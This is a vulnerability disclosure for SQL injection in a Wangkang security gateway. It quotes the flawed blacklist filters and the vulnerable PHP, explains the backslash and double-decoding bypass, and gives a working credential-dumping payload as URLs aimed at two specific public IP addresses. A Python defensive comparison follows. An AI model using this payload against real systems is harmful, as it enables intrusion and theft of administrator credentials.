Wangkang security gateway SQL injection (bypassing the global anti-injection filter)
Since the last round of reports against Wangkang Technology's products, their overall security has improved greatly (applause ...).
Its global filter function is extremely aggressive. After some study, we finally found an injection that bypasses this aggressive global anti-injection filter.
0x01 Let's first take a look at the global filter function.
function inject_check($sql_str){
    // blacklist of SQL keywords and path/quote characters, matched case-insensitively
    return preg_match("/(select|insert|update|delete|drop|'|\/\*|\.\.\/|\.\/|UNION|into|load_file|outfile)/i", $sql_str);
}
And an even stricter one:
function str_check($str){
    // reject the value outright if it contains any of these characters
    if(strstr($str, ' '))return false;
    if(strstr($str, "'"))return false;
    if(strstr($str, '"'))return false;
    if(strstr($str, '/'))return false;
    if(strstr($str, '&'))return false;
    if(strstr($str, ';'))return false;
    if(strstr($str, '%'))return false;
    return true;
}
Whenever one of these symbols or characters is detected, exit() is called directly, which is harsh.
0x02 How the injection arises
The vulnerable file is
/WebPages/applyhardware.php
Relevant code:
include("include/common.inc");
session_start();
$para = $_SESSION['parastr'];
if(!str_check($action))$action = "";
switch ($action){
    case "":
        redirect("/vpnweb/index.php?para=$para");
        break;
    case "applyhardware":
        $dbh = db_connect();
        // the parameters are URL-decoded a second time before being checked
        $hard_user = urldecode($hard_user);
        $hard_pass = urldecode($hard_pass);
        if(!str_check($hard_user))$hard_user = "";
        if(!str_check($hard_pass))$hard_pass = "";
        // values are concatenated straight into the query
        $query = "select UserId from ISCUserTable where UserName='$hard_user' and Password='$hard_pass'";
The $hard_user and $hard_pass parameters are checked by str_check, but only after they have been passed through urldecode. The statement that finally reaches the SQL query is:
select UserId from ISCUserTable where UserName='$hard_user' and Password='$hard_pass'
So I finally thought of combining the two parameters to achieve the injection.
0x03 Exploiting the injection
From the analysis of the str_check function, the submitted parameters cannot contain spaces, single quotes, double quotes, slashes, semicolons and so on. After numerous tests, the final payload used is:
hard_user=%255C&hard_pass=%0a%0dand%0a%0d1=(updatexml(1,concat(0x5e24,(select%0a%0dconcat(adminname,0x7e,passwd)%0a%0dfrom%0a%0dAdmin%0a%0dlimit%0a%0d1),0x5e24),1))%2523
https://60.216.87.203//WebPages/applyhardware.php?action=applyhardware&hard_user=%255C&hard_pass=%0a%0dand%0a%0d1=(updatexml(1,concat(0x5e24,(select%0a%0dconcat(adminname,0x7e,passwd)%0a%0dfrom%0a%0dAdmin%0a%0dlimit%0a%0d1),0x5e24),1))%2523
https://115.24.177.57/WebPages/applyhardware.php?action=applyhardware&hard_user=%255C&hard_pass=%0a%0dand%0a%0d1=(updatexml(1,concat(0x5e24,(select%0a%0dconcat(adminname,0x7e,passwd)%0a%0dfrom%0a%0dAdmin%0a%0dlimit%0a%0d1),0x5e24),1))%2523
Solution:
Apply inject_check() filtering to these parameters as well.
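As an added illustration (not the vendor's code or part of the original report), the block below ports the str_check() blacklist from section 0x01, places a username whitelist beside it, and replaces the concatenated query from section 0x02 with a bound-parameter lookup. The table, the account row and the inputs are constructed here; the inputs only reproduce the characters the write-up relies on after the gateway's double URL decoding.

```python
import re
import sqlite3
import urllib.parse

# Port of the gateway's str_check() blacklist, as quoted in the write-up,
# used here only to compare it with a whitelist.
def str_check(s: str) -> bool:
    return not any(c in s for c in (" ", "'", '"', "/", "&", ";", "%"))

# Whitelist for the user name (added here, not the vendor's code): letters,
# digits and a few separators. Backslash, CR/LF and '#' never match, which is
# exactly the set str_check() overlooks.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")

def username_ok(s: str) -> bool:
    return USERNAME_RE.fullmatch(s) is not None

def lookup_user(conn, hard_user: str, hard_pass: str):
    """Login lookup with bound parameters: both values are data, never SQL text."""
    if not username_ok(hard_user):
        return None
    row = conn.execute(
        "select UserId from ISCUserTable where UserName=? and Password=?",
        (hard_user, hard_pass),
    ).fetchone()
    return row[0] if row else None

def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ISCUserTable(UserId integer, UserName text, Password text)")
    conn.execute("insert into ISCUserTable values (1, 'alice', 'correct-horse')")
    # Constructed inputs: the double URL decoding the gateway performs turns
    # %255C into '\', %0a%0d into LF/CR and %2523 into '#'.
    user = urllib.parse.unquote(urllib.parse.unquote("%255C"))
    pw = urllib.parse.unquote(urllib.parse.unquote("%0a%0dand%0a%0d1=1%2523"))
    return {
        "blacklist_passes": str_check(user) and str_check(pw),                 # True
        "whitelist_rejects_user": not username_ok(user),                       # True
        "bound_query_with_injected_password": lookup_user(conn, "alice", pw),  # None
        "valid_login": lookup_user(conn, "alice", "correct-horse"),            # 1
    }
```

The blacklist passes both decoded values untouched, while the whitelist refuses the backslash and the bound query treats the CR/LF-laden password as an ordinary, non-matching string.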